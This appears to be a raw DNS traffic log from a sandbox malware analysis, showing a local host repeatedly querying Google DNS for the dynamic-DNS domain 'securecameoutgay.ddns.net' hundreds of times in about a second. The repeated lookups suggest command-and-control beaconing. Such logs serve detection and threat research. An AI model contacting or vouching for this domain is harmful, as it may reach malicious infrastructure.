                                                    Oct 12, 2024 23:05:31.657898903 CEST192.168.2.148.8.8.80x9eeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.666152000 CEST192.168.2.148.8.8.80x9eeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.672820091 CEST192.168.2.148.8.8.80x9eeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.679403067 CEST192.168.2.148.8.8.80x9eeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.687608957 CEST192.168.2.148.8.8.80x4be3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.697104931 CEST192.168.2.148.8.8.80x4be3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.706430912 CEST192.168.2.148.8.8.80x4be3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.714447021 CEST192.168.2.148.8.8.80x4be3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.722368956 CEST192.168.2.148.8.8.80x4be3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.730309010 CEST192.168.2.148.8.8.80x654dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.738101006 CEST192.168.2.148.8.8.80x654dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.746298075 CEST192.168.2.148.8.8.80x654dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.754043102 CEST192.168.2.148.8.8.80x654dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.762350082 CEST192.168.2.148.8.8.80x654dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.769141912 CEST192.168.2.148.8.8.80xcbe1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.775829077 CEST192.168.2.148.8.8.80xcbe1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.784245968 CEST192.168.2.148.8.8.80xcbe1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.790904045 CEST192.168.2.148.8.8.80xcbe1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.798336983 CEST192.168.2.148.8.8.80xcbe1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.807300091 CEST192.168.2.148.8.8.80xbc40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.814157009 CEST192.168.2.148.8.8.80xbc40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.821022034 CEST192.168.2.148.8.8.80xbc40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.827428102 CEST192.168.2.148.8.8.80xbc40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.834462881 CEST192.168.2.148.8.8.80xbc40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.841487885 CEST192.168.2.148.8.8.80x6b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.848130941 CEST192.168.2.148.8.8.80x6b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.854937077 CEST192.168.2.148.8.8.80x6b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.861418962 CEST192.168.2.148.8.8.80x6b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.867888927 CEST192.168.2.148.8.8.80x6b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.874270916 CEST192.168.2.148.8.8.80xdd18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.881261110 CEST192.168.2.148.8.8.80xdd18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.887758017 CEST192.168.2.148.8.8.80xdd18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.894298077 CEST192.168.2.148.8.8.80xdd18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.901026011 CEST192.168.2.148.8.8.80xdd18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.907540083 CEST192.168.2.148.8.8.80xff46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.913995981 CEST192.168.2.148.8.8.80xff46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.920742035 CEST192.168.2.148.8.8.80xff46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.927269936 CEST192.168.2.148.8.8.80xff46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.934087038 CEST192.168.2.148.8.8.80xff46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.940763950 CEST192.168.2.148.8.8.80x3082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.947180033 CEST192.168.2.148.8.8.80x3082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.953540087 CEST192.168.2.148.8.8.80x3082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.960422993 CEST192.168.2.148.8.8.80x3082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.969188929 CEST192.168.2.148.8.8.80x3082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.975739956 CEST192.168.2.148.8.8.80x2e4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.982234001 CEST192.168.2.148.8.8.80x2e4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.988775969 CEST192.168.2.148.8.8.80x2e4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.995831966 CEST192.168.2.148.8.8.80x2e4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.002801895 CEST192.168.2.148.8.8.80x2e4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.010189056 CEST192.168.2.148.8.8.80xc2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.016941071 CEST192.168.2.148.8.8.80xc2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.023983955 CEST192.168.2.148.8.8.80xc2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.030843019 CEST192.168.2.148.8.8.80xc2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.038418055 CEST192.168.2.148.8.8.80xc2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.045059919 CEST192.168.2.148.8.8.80x7e3bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.051893950 CEST192.168.2.148.8.8.80x7e3bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.058623075 CEST192.168.2.148.8.8.80x7e3bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.065046072 CEST192.168.2.148.8.8.80x7e3bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.071738958 CEST192.168.2.148.8.8.80x7e3bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.078321934 CEST192.168.2.148.8.8.80x2e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.084920883 CEST192.168.2.148.8.8.80x2e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.091860056 CEST192.168.2.148.8.8.80x2e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.098721981 CEST192.168.2.148.8.8.80x2e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.105587959 CEST192.168.2.148.8.8.80x2e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.112229109 CEST192.168.2.148.8.8.80x3e70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.118792057 CEST192.168.2.148.8.8.80x3e70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.125368118 CEST192.168.2.148.8.8.80x3e70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.132364035 CEST192.168.2.148.8.8.80x3e70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.138904095 CEST192.168.2.148.8.8.80x3e70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.145354986 CEST192.168.2.148.8.8.80x57dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.151812077 CEST192.168.2.148.8.8.80x57dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.158158064 CEST192.168.2.148.8.8.80x57dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.164653063 CEST192.168.2.148.8.8.80x57dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.171534061 CEST192.168.2.148.8.8.80x57dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.178594112 CEST192.168.2.148.8.8.80x8142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.185096025 CEST192.168.2.148.8.8.80x8142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.191679955 CEST192.168.2.148.8.8.80x8142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.198739052 CEST192.168.2.148.8.8.80x8142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.205460072 CEST192.168.2.148.8.8.80x8142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.212371111 CEST192.168.2.148.8.8.80x1837Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.219103098 CEST192.168.2.148.8.8.80x1837Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.225562096 CEST192.168.2.148.8.8.80x1837Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.231993914 CEST192.168.2.148.8.8.80x1837Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.238761902 CEST192.168.2.148.8.8.80x1837Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.245389938 CEST192.168.2.148.8.8.80x5f2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.252180099 CEST192.168.2.148.8.8.80x5f2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.258701086 CEST192.168.2.148.8.8.80x5f2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.265470028 CEST192.168.2.148.8.8.80x5f2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.271927118 CEST192.168.2.148.8.8.80x5f2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.279019117 CEST192.168.2.148.8.8.80x9723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.285361052 CEST192.168.2.148.8.8.80x9723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.292213917 CEST192.168.2.148.8.8.80x9723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.299854040 CEST192.168.2.148.8.8.80x9723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.306519032 CEST192.168.2.148.8.8.80x9723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.312949896 CEST192.168.2.148.8.8.80xdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.319721937 CEST192.168.2.148.8.8.80xdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.326108932 CEST192.168.2.148.8.8.80xdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.332561016 CEST192.168.2.148.8.8.80xdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.339060068 CEST192.168.2.148.8.8.80xdf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.345747948 CEST192.168.2.148.8.8.80x6925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.352484941 CEST192.168.2.148.8.8.80x6925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.358733892 CEST192.168.2.148.8.8.80x6925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.364980936 CEST192.168.2.148.8.8.80x6925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.371470928 CEST192.168.2.148.8.8.80x6925Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.378163099 CEST192.168.2.148.8.8.80x2c44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.384337902 CEST192.168.2.148.8.8.80x2c44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.390794992 CEST192.168.2.148.8.8.80x2c44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.397156000 CEST192.168.2.148.8.8.80x2c44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.403587103 CEST192.168.2.148.8.8.80x2c44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.410154104 CEST192.168.2.148.8.8.80x4279Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.416580915 CEST192.168.2.148.8.8.80x4279Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.423259020 CEST192.168.2.148.8.8.80x4279Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.429843903 CEST192.168.2.148.8.8.80x4279Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.436548948 CEST192.168.2.148.8.8.80x4279Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.442841053 CEST192.168.2.148.8.8.80x8f5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.449850082 CEST192.168.2.148.8.8.80x8f5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.457341909 CEST192.168.2.148.8.8.80x8f5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.463820934 CEST192.168.2.148.8.8.80x8f5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.470427990 CEST192.168.2.148.8.8.80x8f5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.477348089 CEST192.168.2.148.8.8.80xd154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.484342098 CEST192.168.2.148.8.8.80xd154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.491225004 CEST192.168.2.148.8.8.80xd154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.497941017 CEST192.168.2.148.8.8.80xd154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.504781008 CEST192.168.2.148.8.8.80xd154Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.511531115 CEST192.168.2.148.8.8.80x8a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.518204927 CEST192.168.2.148.8.8.80x8a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.525127888 CEST192.168.2.148.8.8.80x8a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.531836987 CEST192.168.2.148.8.8.80x8a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.538296938 CEST192.168.2.148.8.8.80x8a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.545264959 CEST192.168.2.148.8.8.80xb01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.551796913 CEST192.168.2.148.8.8.80xb01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.558307886 CEST192.168.2.148.8.8.80xb01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.565083027 CEST192.168.2.148.8.8.80xb01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.572786093 CEST192.168.2.148.8.8.80xb01fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.579613924 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.586267948 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.593135118 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.599623919 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.606465101 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.613213062 CEST192.168.2.148.8.8.80xd39eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.619894028 CEST192.168.2.148.8.8.80xd39eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.626821995 CEST192.168.2.148.8.8.80xd39eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.633549929 CEST192.168.2.148.8.8.80xd39eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.640101910 CEST192.168.2.148.8.8.80xd39eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.649113894 CEST192.168.2.148.8.8.80x7253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.655688047 CEST192.168.2.148.8.8.80x7253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.662620068 CEST192.168.2.148.8.8.80x7253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.669296980 CEST192.168.2.148.8.8.80x7253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.675565004 CEST192.168.2.148.8.8.80x7253Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.682435989 CEST192.168.2.148.8.8.80x21cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.689083099 CEST192.168.2.148.8.8.80x21cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.696085930 CEST192.168.2.148.8.8.80x21cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.704211950 CEST192.168.2.148.8.8.80x21cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.714209080 CEST192.168.2.148.8.8.80x21cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.721533060 CEST192.168.2.148.8.8.80x343dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.732100964 CEST192.168.2.148.8.8.80x343dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.739144087 CEST192.168.2.148.8.8.80x343dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.745840073 CEST192.168.2.148.8.8.80x343dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.752540112 CEST192.168.2.148.8.8.80x343dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.759418011 CEST192.168.2.148.8.8.80xa326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.766587019 CEST192.168.2.148.8.8.80xa326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.773695946 CEST192.168.2.148.8.8.80xa326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.781028032 CEST192.168.2.148.8.8.80xa326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.787928104 CEST192.168.2.148.8.8.80xa326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.794645071 CEST192.168.2.148.8.8.80xbeb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.802102089 CEST192.168.2.148.8.8.80xbeb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.809819937 CEST192.168.2.148.8.8.80xbeb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.816855907 CEST192.168.2.148.8.8.80xbeb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.823759079 CEST192.168.2.148.8.8.80xbeb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.830723047 CEST192.168.2.148.8.8.80x51f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.837305069 CEST192.168.2.148.8.8.80x51f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.843884945 CEST192.168.2.148.8.8.80x51f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.850953102 CEST192.168.2.148.8.8.80x51f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.857969999 CEST192.168.2.148.8.8.80x51f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.864798069 CEST192.168.2.148.8.8.80xbaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.871572018 CEST192.168.2.148.8.8.80xbaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.878597975 CEST192.168.2.148.8.8.80xbaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.885433912 CEST192.168.2.148.8.8.80xbaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.892055988 CEST192.168.2.148.8.8.80xbaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.898863077 CEST192.168.2.148.8.8.80x28b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.905524015 CEST192.168.2.148.8.8.80x28b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.912319899 CEST192.168.2.148.8.8.80x28b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.919644117 CEST192.168.2.148.8.8.80x28b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.926464081 CEST192.168.2.148.8.8.80x28b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.933429003 CEST192.168.2.148.8.8.80xe7cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.939908028 CEST192.168.2.148.8.8.80xe7cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:32.946749926 CEST192.168.2.148.8.8.80xe7cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
